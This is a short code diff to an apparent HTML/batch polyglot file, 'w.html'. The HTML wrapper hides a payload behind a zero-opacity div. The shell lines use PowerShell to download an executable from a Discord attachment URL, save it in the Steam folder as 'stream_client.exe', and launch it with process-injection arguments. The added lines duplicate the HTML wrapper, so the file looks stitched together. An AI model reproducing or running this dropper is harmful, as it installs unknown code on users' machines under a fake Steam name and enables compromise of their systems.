--- a/w.html
+++ b/w.html
@@ -1,8 +1,12 @@
 # <link href="w.css" rel="stylesheet" />
 # <script src="blocker.js"></script>
 # <div class="process" style="opacity: 0;">
+# <script src="blocker.js"></script>
+# <div class="process" style="opacity: 0;">
+# </div>
+# <div class="text">
   cls
   powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'" 
   & "C:\Program Files (x86)\Steam\stream_client.exe" --process-name rstrui.exe --inject WriteMiniDmp.exe
 # </div>
-  cls
+
